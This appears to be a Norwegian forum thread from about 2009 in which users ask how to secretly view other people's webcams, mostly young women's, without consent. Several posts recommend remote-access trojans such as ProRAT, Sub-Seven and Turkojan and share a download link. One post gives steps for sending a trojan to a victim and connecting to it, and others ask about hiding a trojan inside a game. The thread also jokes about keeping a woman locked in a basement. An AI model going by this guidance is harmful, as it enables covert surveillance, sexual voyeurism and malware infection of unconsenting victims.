Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  234 61584
vil vel ikke funke om man ikke får det instalert på maskinen til offret?
Men klart om man klarer å lure mindre smarte personer til å godta en trojaner så for all del.
Trodde det var snakk om å spionere på jenter, ikke smarte personer xD
De geeker ikke så mye som gutta, og tror sikkert bare at den er litt klikk, istede for oss som skjønner at vi blir sett på... xD
men en annen ting er at det ikke er alle webcams som har lys, som f.eks. noene av de intrigrerte webcams'a...
Tom for megabytes
AtXbYeA's Avatar
Sitat av DonBeefMaster
Trodde det var snakk om å spionere på jenter, ikke smarte personer xD
De geeker ikke så mye som gutta, og tror sikkert bare at den er litt klikk, istede for oss som skjønner at vi blir sett på... xD
men en annen ting er at det ikke er alle webcams som har lys, som f.eks. noene av de intrigrerte webcams'a...
Vis hele sitatet...
Jeg har mine sterke tvil på at du overgår en jente i en test basert på social engineering.
▼ ... noen måneder senere ... ▼
Når jeg sender exe fila til noen kommer det opp en feilmelding når de åpner den, og cam osv.. slår seg ikke på... noen tips til hva jeg bør gjøre?
lære deg programering. evnt så hjelper det MYE med å poste den faktiske feilmeldinga!
forferdelig ide, hva om du selv plutselig ble sedd av hvemsomhelst? D et finns et uttrykk i boken 1984 om det; Fjernskjerm.
var bare en windows feilmelding.. men den funker når jeg sender til andre.. ^^ nice guide!
▼ ... over en måned senere ... ▼
Du kan finne et WebCam-Virus på www.messblack.com i forumene, men du må være PRO på siden + at du må gjøre det U/D, som er vanskelig! >.<
▼ ... noen måneder senere ... ▼
bump

hei folkens, mitt første innlegg her, så vil bare presentere meg fort MAO, hei!

ps:har lest igjennom hele threaden, uten resultat..

til saken. om jeg sitter på samme nett som offeret, åssen kan jeg da gjøre det? har en smokin hot jente i underetasjen ( ja, hun er låst inne uten vinduer osv, og jeg mater henne 1 gang om dagen), som sitter på samme trådløse nett som meg! om jeg vil, kan jeg også låne datan hos.. hva er enkleste løsning for å følge med på cammen hos? takker masse for svar!
Skitten du er.
Ellers er google din beste venn..
Søk etter noe som "view web camera on local network" eller noe i den duren. Løsninger kom på det for lenge siden..
[quote=juzz;1341127]Skitten du er.
Ellers er google din beste venn..
Søk etter noe som "view web camera on local network" eller noe i den duren. Løsninger kom på det for lenge siden.. [/QUOTE

jeg er ikke skitten! (a)

takk for svar
▼ ... noen uker senere ... ▼
jeg fant et program det er vel det letteste du finner for å hacke webcam programmet koster egentlig penger men gratis her ;P http://rapidshare.com/files/127849831/webcam_hack.rar

Tut: det ligger 2 filer der cli3nt og image1.exe, image1.exe er viruset du skal sende til den du vil se på webcam
cli3nt er programmet skriv in ip addressen til offeret. la porten være 285.
connect
start capture
enjoy :P håper dette hjalp

det er ikke noe msn webcam program som finnes. man må sende en trojan for at det skal være mulig.
her er noen hacke programmer som man kan se webcam med osså.
http://prorat.net/downloads.php
Sist endret av darknerd; 3. mars 2009 kl. 22:18. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
Sitat av darknerd Vis innlegg
jeg fant et program det er vel det letteste du finner for å hacke webcam programmet koster egentlig penger men gratis her ;P http://rapidshare.com/files/127849831/webcam_hack.rar
Vis hele sitatet...
har du scanna det der for virus?
Sitat av olli408 Vis innlegg
har du scanna det der for virus?
Vis hele sitatet...
Det er jo en trojaner du får på pc, som du skal sende videre, så da er veld ette virus som blir oppdaget?
Sitat av FaLcOn Vis innlegg
Det er jo en trojaner du får på pc, som du skal sende videre, så da er veld ette virus som blir oppdaget?
Vis hele sitatet...
oh, right x) my bad
Sitat av olli408 Vis innlegg
oh, right x) my bad
Vis hele sitatet...
Logisk tenkning
Sitat av Crispo Vis innlegg
Hadde vært mye fetere å mecke film av en kompis som ronker enn å spionere på damer. Penger å tjene på slikt.
Vis hele sitatet...

Og hvordan vil du tjene på det ?
Sitat av Crispo Vis innlegg
Hadde vært mye fetere å mecke film av en kompis som ronker enn å spionere på damer. Penger å tjene på slikt.
Vis hele sitatet...
Hvorfor kaller du han kompis?
Sitat av darknerd Vis innlegg
jeg fant et program det er vel det letteste du finner for å hacke webcam programmet koster egentlig penger men gratis her ;P http://rapidshare.com/files/127849831/webcam_hack.rar

Tut: det ligger 2 filer der cli3nt og image1.exe, image1.exe er viruset du skal sende til den du vil se på webcam
cli3nt er programmet skriv in ip addressen til offeret. la porten være 285.
connect
start capture
enjoy :P håper dette hjalp
Vis hele sitatet...
Ikke dårlig for din 1 post din dust. Begge exe filene i linken din er infisert og kobler seg opp mot en dns adresse + at dem kobler seg opp mot en irc kanal.

Både client.exe og image1.exe kobler seg opp mot.
DNS adresse : mandycrew.ath.cx

IRC Conversations:
Joined Channel: #m4ndy-cr3w
Nick: mnd-680331 Username: wjeehzt

Så er det noen av dere som har testet dette programmet så har dere fått virus.
Sitat av olli408 Vis innlegg
har du scanna det der for virus?
Vis hele sitatet...
ja dete ensete viruset der er trojanen image

prøv prorat da det er vertfall ikke virus

clienten er ikk no virus men et hacke programm så når du scanner så vil den bli oppdaget som et virus. den skader ikke, når du er ferdig med programmet går du bare på ctrl alt del og slutt server.exe prossecen så er clienten borte:P
Sist endret av darknerd; 5. mars 2009 kl. 20:16. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
▼ ... over en uke senere ... ▼
fant et program fra Piravi Tech som funker på en måte.. det koster litt da.. og du må ha tilgang på datan i noen minutter.. enten det, eller finne ut hvilken IP datan er på, og legge inn fila over nett mens datan er slått på.. finns det no program som finner ut IP-en til en annen person automatisk?
▼ ... noen måneder senere ... ▼
Går det an å komplimere en trojaner sammen med et lite spill eller noe?
▼ ... over en måned senere ... ▼
det finnes et virus som gjør dette
Sitat av AtXbYeA Vis innlegg
Jeg har mine sterke tvil på at du overgår en jente i en test basert på social engineering.
Vis hele sitatet...
OT:

Og de konkluderer du ut ifra hva? Kan fint forstå at det kan være spennende å snike seg til å se på andre via cam mens de ikke vet det. Usaklig at du skal dømme noen for det.
▼ ... noen uker senere ... ▼
Hei

I forhold til bruk av turkojan,,hvordan setter man opp en server?
▼ ... over en uke senere ... ▼
er noe som heter webmsnspy. den skal vist funke. ikke testet selv men har kompis som har testet. bare google webmsnspy så skal det komme frem om dere ikke har testet det da?
Prøvde å google webmsnspy, det funker tydeligvis (ifølge kilder) men jeg finner ingen plasser å få lasta det ned.
skal se om jeg finner. men akurat nå er jeg på jobb. men da jeg søkte fant jeg torrent nedlastninger som blandt de første. om de er de riktige skal jeg ikke si noe på.
Sitat av HaZnO Vis innlegg
Webcam og fine damer er alltid skøy, men kjipt når man ikke får lov til å se de på cam når man vet de har osv..
Jeg googla litt, men fant kun noen greier til yahoo..
Hva jeg er ute etter, er et program ellerno som gjør at man kan se på andre sine webcam på msn messenger uten å måtte ha fått tillatelse til det?
For de som er interessert i dette til yahoo messenger, google etter "webcam without permission" ellerno
Vis hele sitatet...
anyone funnet svaret

edit: ja jeg har lest gjennom hele posten og funnet ut at det egentlig ikke var noen brae svar for så og si nybegynnere.
Sist endret av eskil2k; 2. oktober 2009 kl. 07:41.
Det er smått bekymringsverdig, tragisk og pinlig at denne tråden lever enda.
Sitter dere fremdeles og venter på vidunderprogrammene? Hadde det ikke vært raskere å bare mase høl i huet på aktuelle jenter (eller gutter?) istedet? Og eh... om dere evt oppnår resultat med noe program e.l., får dere ikke jævlig dårlig samvittighet der dere sitter og glor og venter på random flashing eller w/e?
Jeg veit at jeg hadde følt meg som en skitten og pervertert overgriper om jeg satt og spionerte på venninner hvertfall. Får vel bare håpe på at de fleste av dere er tidlig i puberteten og ikke vet bedre, selv om jeg har mine tvil.
Noen som kan laste opp den prosjekt1-tingen som var her tidligere? Siden er nede, der du lastet den ned. Som Gisse la ut.
Last ned Sub-Seven (google is your friend), og på mystisk vis få dem til å kjøre server filen. Skriv inn IP'en dems, og vips, du kan se på webcam'en deres
▼ ... over en måned senere ... ▼
Noen som har testet Sub-seven?
Har vært utallige mange tråder om dette og alle får samme svar at det ikke finnes noe program som kan gjøre dette. Eneste blir og lage en trojan
Sitat av Natz Vis innlegg
Har vært utallige mange tråder om dette og alle får samme svar at det ikke finnes noe program som kan gjøre dette. Eneste blir og lage en trojan
Vis hele sitatet...
Det er det jeg leter etter, kanskje en fin step by step guide for n00bs som meg